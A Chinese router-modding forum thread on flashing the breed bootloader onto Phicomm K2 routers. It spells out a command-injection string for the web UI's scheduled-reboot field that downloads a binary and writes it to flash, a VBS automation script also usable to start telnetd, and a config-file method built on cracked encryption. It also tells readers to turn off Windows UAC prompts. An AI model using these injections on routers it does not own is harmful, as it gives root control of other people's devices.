QQ登录

只需一步,快速开始

搜索
广告投放联系QQ68610888

【刷机必读】斐讯K2刷breed的安全方法及开源一键刷机脚本和终极大法【2017-04-24】

火... [复制链接]

注:此贴发布较早,目前有更加简便的方法来刷breed,就是直接在官方版本上升级163 V1.4定制版本,里面包含了breed
       支持所有官方版本,包括最新的K2_22.5.10.176和22.5.11.5等,不用任何工具,如提示非法固件,请恢复出厂后再试
----------------------------------------------------------------------------------------------------------------------------------------------------

如果你是小白或者不想听我啰嗦,只想痛快的、安全的一键刷机,你可以往下拉至蓝色字体部分;终极大法请拉至最后

如果你想知道来龙去脉或者想学习点东西,那就听我娓娓道来

----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
斐迅K2刷机的最大风险是什么?答案是刷breed或uboot(bootloader)

bootloader相当于计算机的bios,只要bios不坏,你可以通过U盘、光驱来重装系统,如果bios坏了,那就成砖了,动用编程器不是一般用户能玩转的。

K2也是一样,只要bootloader(不管是breed还是官方的uboot)没有损坏,都可以有办法挽救回来,如果bootloader坏了,就等着返厂吧...

同时,刷breed也是你刷机的第一步,只有有了这个第三方的bios,你才能在众多第三方固件中自由翱翔、任意挑选,下面我们来看看如何在官方版本上刷breed。

目前刷breed的通常的方法是利用【WEB漏洞】,但是有不少用户利用此方法刷breed刷成砖了,原因是breed文件下载环节没有文件校验,如果下载失败或错误就必然成砖了。

我每次通过WEB漏洞来刷breed时也总是提心吊胆,生怕出现万一的情况,于是我写了下面的脚本,对下载的breed文件进行MD5校验后再写入。

以后刷写breed,利用定时重启的WEB漏洞输入如下语句就可以更加安全的刷写(由于新breed的官方下载网站采用了https,而K2的wget不支持https,因此需从其他http网站下载breed):

05 |wget -T 10 http://breed.hackpascal.net/breed-mt7620-phicomm-psg1208.bin -O /tmp/breed.bin && [ -f /tmp/breed.bin ] && [ $(md5sum /tmp/breed.bin|cut -d ' ' -f1) = 29bb021be2cc037ca4d8daa2d4b90a59 ] && mtd unlock Bootloader&&mtd -r write /tmp/breed.bin Bootloader

1. 05 |wget -T 10 http://iytc.net/tools/breed0416.bin -O /tmp/breed.bin && [ -f /tmp/breed.bin ] && [ $(md5sum /tmp/breed.bin|cut -d ' ' -f1) = 164cb272152740b164b9caab84a33d0a ] && mtd unlock Bootloader&&mtd -r write /tmp/breed.bin Bootloader
复制代码

注:这个是一行语句,不要分行,拷贝的时候不要拷贝错了(拷漏字符)

图示:

如果执行成功,K2会自动复位,指示灯变红;如果失败,K2不会复位,也不会损坏uboot。
如果你执行了上述语句后K2没有复位,请检查你的操作步骤是否执行正确(注意输入语句后需重新选择05选项,可以看到"05"后的新增语句)、K2是否能够正确上网等。

上面语句比较复杂,我们把它展开解释一下,有兴趣者可供参考:
  1. #K2能正常联网,下载breed,设置10秒超时
  2. wget -T 10 http://iytc.net/breed0416.bin -O /tmp/breed.bin

3. #判断是否有下载文件
  4. if [ -f "/tmp/breed.bin" ] ;then
  5. vmd5=`md5sum /tmp/breed.bin|cut -d ' ' -f1 `
  6. #判断下载文件的MD5值是否正确
  7. if [ "$vmd5" = "164cb272152740b164b9caab84a33d0a" ] ;then
  8.   #如果正确则开始刷写breed
  9.   mtd unlock Bootloader
  10.   mtd -r write /tmp/breed.bin Bootloader
  11. fi
  12. fi
复制代码

后续如果breed版本更新了,你只要自行修改下载地址(http://breed.hackpascal.net/breed-mt7620-phicomm-psg1208.bin)及MD5值(29bb021be2cc037ca4d8daa2d4b90a59 )就可以了

【一键刷机脚本】
--------------------------------------------------------------------------------------------------------------------------------------------------------
你是不是觉得上面的步骤很麻烦,有时我自己也觉得麻烦,那我们再来做一个一键刷机的脚本。
我们用vbs脚本来模拟K2网页的登录以及WEB漏洞语句的输入过程。

在执行脚本前,你应该先选好第三方固件【参考

其次请保证你的K2能够正常上网,K2的管理页面地址设置为缺省的http://192.168.2.1,登录密码设置为"admin",计算机通过wifi或网线能够正常连接管理页面。

最后,下载并解压下面的脚本文件,然后在计算机上双击执行,会自动弹出IE界面,然后自动刷机,无需人工操作:

0424更新脚本(breed更新为20170416版本):

如果执行成功,K2会自动复位,指示灯变红,表示最新的breed已经刷入;
如果失败,K2不会复位,也不会损坏uboot,但是强烈建议如果失败在执行脚本后30秒之内不要进行任何操作(比如重新执行脚本、断电、复位等)。

注:所有版本都可以直接刷,不需要降级什么的操作,刷好后直接用breed刷入第三方固件。

breed进入方式:电脑连接LAN口自动获取 IP 地址,按住K2复位键再通电,持续按住几秒,然后电脑访问http://192.168.1.1即可在WEB刷第三方固件

刷之前建议你先到“固件备份”中保存所有的东西到计算机上,以免不时之需。

这是个开源的脚本文件,你可以用任何文本编辑器打开并修改,比如你可以配置缺省的登录密码及K2地址:
  1. password = "admin" '登录密码
  2. k2_url = "http://192.168.2.1/" '登录网址
复制代码

其实这个脚本的作用不只刷breed这么简单,事实上,你可以把它改成一键执行K2上的任何命令,比如一键开启telnet,只需修改mcmd语句:
  1. mcmd="05 | /usr/sbin/telnetd -l /bin/login.sh"
复制代码

如上一键脚本在win7、win10,K2 V22.4.5.42、V22.5.9.163版本测试通过,应该适用所有存在此漏洞的版本。

如果你成功了,请反馈一下所用系统及K2版本,如果失败了,也请反馈一下,以便于脚本的改进,造福更多网友!

开源的好处是公开、透明、众人监督和完善,免除一些不必要的担心,人人为我、我为人人!

如果你使用脚本遇到问题或者对改进脚本有任何建议,请加入breed一键刷机脚本交流QQ群:

放心,这是安全刷机,只要你不在刷的时候断电或复位,不会损坏你的bootloader的,最后,祝你玩机愉快!!

【适用性反馈记录】
--------------------------------------------------------------------------------------------------------------------------------------------------------
系统:win7、win10
硬件版本:K1、K2 A2、A6 (670楼反馈可用)
软件版本:K2 V22.4.6.3、V22.4.5.42(564楼反馈可用)、V22.5.9.163(596、648楼反馈可用)、K1 V22.4.2.15
注:只要支持此WEB漏洞并且页面控件ID一样(不一样可以自己修改),不分K1、K2,不分软、硬件版本,全部支持(因为它们的breed都是同一个)
即使不支持,执行失败也不会有任何影响。如果你当前的版本不支持,请升级至支持的版本后再执行脚本。

【排错处理】
如果你运行脚本出现错误,请设置windows的“用户账户控制设置”为“从不通知”:

另有网友反馈先打开IE,再执行脚本会避免一些错误提示

如果你当前K2的版本不支持WEB漏洞,请先升级到支持web漏洞的官方版本,比如V22.4.5.42、V22.5.9.163等,再执行脚本

如果排错处理后,一键脚本还是执行出错,请换一台计算机执行

如果还是不行,不用伤心,在浏览器中用WEB漏洞输入安全的刷机语句即可,我们以前一直也是这样做的

【终极大法】
其实上面的步骤已经够简单了,但是有很多网友反馈脚本执行出现错误,好吧,我们现在请出终极武器-配置文件恢复法。

在很久很久以前,配置文件恢复法是很好使的,其原理是覆盖现有的配置,尤其是自启动文件,添加进自己想要执行命令,比如刷入breed,不过后来斐讯迅速加入了配置文件的加密。

有加密就有解密,经过我花了一天多时间的努力,加密算法已经被破解【参考】,现在你可以通过网页来下载你K2的breed配置文件,只需在配置恢复界面导入即可自动刷入breed。

【步骤】
1、访问如下网址,输入WAN口MAC地址,自动生成配置文件
http://iytc.net/k2.php

2、在K2 WEB管理页面“高级设置”-“系统设置”-“备份恢复”界面,导入下载的配置文件,然后点击“恢复备份”按钮即可。

【说明】
1、刷入breed不会修改你当前的配置,breed配置文件中自带最新的breed程序,导入时无需联网(联网也没关系),在刷入时会进行MD5校验,保证安全。
2、恢复配置后,K2会复位两次,此时请不要断电或人工复位;
3、breed版本为20170416版本,支持163分区启动。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

我的系统是win10 1703 不知道与这个有没有关系  发表于 2017-9-12 16:32
有问题刷坏了我二个k2.第一个坏掉还不知道是这个的问题。今天第二个又坏了才知道。这次买了二个k2,另外一个用别的刷breed用的好好的。症状是用了BREED之后,进breed刷完固件,一个小时后路由器驾崩,breed都进不...  发表于 2017-9-12 16:31
楼主你都担心breed文件损坏什么的,你可以直接本机上建个http server就简单多了。  发表于 2017-4-26 17:40
你的排错处理是在降低系统的安全性  发表于 2017-4-24 17:29
受用。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。  发表于 2017-3-20 21:10

评分

ohxiangzi + 1 恩山全体路由党向你学习!
Bog + 1 感谢大神、感谢大神啊、么么哒
q165375115 + 1 兄弟 iytc.net/k2.php 这个403了
ou1200 + 1 强大的恩山!(以下重复1万次)
鲜锅兔儿 + 3 支付宝已转5毛给你!
lj8033 + 1 K2 A2 软件版本号:22.4.5.42 win7 32位旗舰版 成功,感谢
qq812258731 -1 有问题刷坏了我二个k2.第一个坏掉还不知道是这个的问题。今天第二个又坏了才知道。
crazyboyshun + 1 犀利
飘朵朵 + 1 今天天气不错,适合泡妞。
依风听雨 + 1 支付宝已转500w给你! K2 A2 22.5.10.176 VBS失败,配置恢
hyhelena + 1 我来恩山就是为了看你!
qq943063692 + 1 强大的恩山!(以下重复1万次)
黯里。着迷 + 1 支付宝已转500w给你!
沙羅双樹 + 1 强大的恩山!(以下重复1万次)
as8680 -1 楼主够恶心,加群还付费
墨守成规_ + 1 切糕党手持切糕刀强势围观楼主!
dwndwn123 + 1 亲,你太牛逼了,走,我请你吃鳇鱼头去~~~
ahdszyp + 1 支付宝已转500w给你!
877812210 + 1 楼主我爱死你了!!之前用05漏洞怪不得不行,原来改https了
jjyyzz + 1 楼主威武—我就想问问挖掘机技术哪家强?
chaozhou + 1 一看就是觉得高端、大气、上档次!
BGLongLong + 1 楼主威武—我就想问问挖掘机技术哪家强?
onlyellow -1 支付宝已转500w给你!
hyfcloud + 1 我来恩山就是为了看你!
lzhsc + 1 怀揽白富美的屌丝露出了惊讶的眼神:哥,你太帅了!
洛叶缒枫 + 1 我来恩山就是为了看你!
xiangt + 1 亲,你太牛逼了,走,我请你吃鳇鱼头去~~~
武威 + 1 亲,你太牛逼了,走,我请你吃鳇鱼头去~~~
308744463 + 1 支付宝已转500w给你!
luxer + 1 楼主威武—我就想问问挖掘机技术哪家强?
享受现在 + 1 我手抖了下,加分变扣分了!
sogno + 1 我来恩山就是为了看你!
zyzhuyue + 1 支付宝已转500w给你!
SeasonLin + 1 赞一个,你是我的呕像!
在游泳的猫 + 1 支付宝已转500w给你!
dufenk + 1 支付宝已转500w给你!
夹克油 + 1 亲,你这么厉害,我想做你的经纪人!
abluns + 1 支付宝已转500w给你!
manluck + 1 一看就是觉得高端、大气、上档次!
sd-song + 1 这是要上头条的节奏
sujian42007 + 1 亲,你太牛逼了,走,我请你吃鳇鱼头去~~~
nituixian + 1 支付宝已转500w给你!
1563110261 + 1 win7无法打开 找不到程序执行 求指导
熟悉又陌生 + 1 亲,你这么厉害,我想做你的经纪人!
20263820 + 1 楼主威武—我就想问问挖掘机技术哪家强?
懒浮云 + 1 我来恩山就是为了看你!
xiaoercb + 1 支付宝已转500w给你!
Chongzi + 1 一看就是觉得高端、大气、上档次!
zbbenben + 1 亲,你太牛逼了,走,我请你吃鳇鱼头去~~~
常林 + 1 楼主威武—我就想问问挖掘机技术哪家强?
singmow + 1 我来恩山就是为了看你!
coolwjl + 1 我来恩山就是为了看你!
cixiclq + 1 亲,你太牛逼了,走,我请你吃鳇鱼头去~~~
阿非 + 1 亲,你太牛逼了,走,我请你吃鳇鱼头去~~~
huserszm + 1 支付宝已转500w给你!
潜水者 + 1 a6版本已成功用一键工具刷成功
xiaotuguo + 1 已返厂,换回来照你的试试
jieanxun + 1 有其他好的办法可以直接刷的。
xzwl1234 + 1 泥马,真给力,我要顶!
七月未央 + 1 亲,你这么厉害,我想做你的经纪人!
落雨收衫 + 1 支付宝已转500w给你!
流失 + 1 我来恩山就是为了看你!
tdcs + 1 亲,你太牛逼了,走,我请你吃鳇鱼头去~~~
zhl416 + 1 城会玩

我的恩山、我的无线 The best wifi forum is right here.
想看一看,学习借鉴。
我的恩山、我的无线 The best wifi forum is right here.

感谢分享,正需要

感谢分享,正需要

谢谢分享  学习

谢谢分享啊啊啊啊

感谢分享,正需要

对,这个要得!
不过不要程序本身再出问题,那就笑话了!

.................................................

看看    学习学习

可以考虑一下!!!

这个必须顶一下

想看一看,学习借鉴。

这个要学习一下~

想看一看,学习借鉴